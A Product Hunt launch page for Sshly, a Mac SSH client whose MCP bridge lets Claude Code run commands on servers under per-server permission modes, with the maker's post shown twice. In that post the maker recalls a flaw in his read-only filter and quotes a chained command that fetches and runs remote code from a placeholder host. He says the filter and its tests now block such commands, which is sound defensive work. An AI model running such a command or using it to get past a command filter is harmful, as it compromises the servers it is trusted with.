This product was not featured by Product Hunt yet. It will not be visible on their landing page and won't be ranked (cannot win product of the day regardless of upvotes).
Product upvotes vs the next 3
Waiting for data. Loading
Product comments vs the next 3
Waiting for data. Loading
Product upvote speed vs the next 3
Waiting for data. Loading
Product upvotes and comments
Waiting for data. Loading
Product vs the next 3
Loading
Sshly — SSH, made friendly.
SSH, SFTP & tunnels for Mac — with safe AI access
A friendly SSH client for Mac. Connections, keys, files — all in one app. No subscriptions. No bloat.
I'm Jonas, a solo developer from Germany. I built Sshly because managing servers on a Mac should feel like using a Mac - and because paying monthly, forever, to open an SSH session never sat right with me. One-time purchase: €19, updates included, and free for 3 connections with no trial clock. The first 100 licenses are €9.99.
The part I'd most like your take on is the AI bridge. I kept copy-pasting between Claude Code and my terminal, so I made Sshly an MCP server. Claude asks for a server by name, Sshly runs the command and hands back the output - your password or private key never leaves the macOS Keychain. You set the rules per server: approve every command, read-only diagnostics, or trusted.
Getting "read-only" was quite humbling. My first version only looked at the first word of a command, so `ls ; curl evil | sh` sailed straight through. It now refuses pipes, chaining, and anything that can launch another program, and there are tests for exactly those cases.
And yes, it's Electron. I know the reputation, so I put the work into what you actually feel: batched output, backpressure so a runaway log can't freeze the app, and Nagle disabled so keystrokes land like a local shell.
macOS 12+, Apple Silicon. Intel builds and iCloud sync are the two things I get asked about most - which would you want first?
Happy to answer anything :) I'm here all day.
About Sshly — SSH, made friendly. on Product Hunt
“SSH, SFTP & tunnels for Mac — with safe AI access”
Sshly — SSH, made friendly. was submitted on Product Hunt and earned 3 upvotes and 1 comments, placing #39 on the daily leaderboard. A friendly SSH client for Mac. Connections, keys, files — all in one app. No subscriptions. No bloat.
On the analytics side, Sshly — SSH, made friendly. competes within Mac, Developer Tools, Artificial Intelligence and GitHub — topics that collectively have 1.1M followers on Product Hunt. The dashboard above tracks how Sshly — SSH, made friendly. performed against the three products that launched closest to it on the same day.
Who hunted Sshly — SSH, made friendly.?
Sshly — SSH, made friendly. was hunted by Jonas. A “hunter” on Product Hunt is the community member who submits a product to the platform — uploading the images, the link, and tagging the makers behind it. Hunters typically write the first comment explaining why a product is worth attention, and their followers are notified the moment they post. Around 79% of featured launches on Product Hunt are self-hunted by their makers, but a well-known hunter still acts as a signal of quality to the rest of the community. See the full all-time top hunters leaderboard to discover who is shaping the Product Hunt ecosystem.
For a complete overview of Sshly — SSH, made friendly. including community comment highlights and product details, visit the product overview.
Hi Product Hunt 👋
I'm Jonas, a solo developer from Germany. I built Sshly because managing servers on a Mac should feel like using a Mac - and because paying monthly, forever, to open an SSH session never sat right with me. One-time purchase: €19, updates included, and free for 3 connections with no trial clock. The first 100 licenses are €9.99.
The part I'd most like your take on is the AI bridge. I kept copy-pasting between Claude Code and my terminal, so I made Sshly an MCP server. Claude asks for a server by name, Sshly runs the command and hands back the output - your password or private key never leaves the macOS Keychain. You set the rules per server: approve every command, read-only diagnostics, or trusted.
Getting "read-only" was quite humbling. My first version only looked at the first word of a command, so `ls ; curl evil | sh` sailed straight through. It now refuses pipes, chaining, and anything that can launch another program, and there are tests for exactly those cases.
And yes, it's Electron. I know the reputation, so I put the work into what you actually feel: batched output, backpressure so a runaway log can't freeze the app, and Nagle disabled so keystrokes land like a local shell.
macOS 12+, Apple Silicon. Intel builds and iCloud sync are the two things I get asked about most - which would you want first?
Happy to answer anything :) I'm here all day.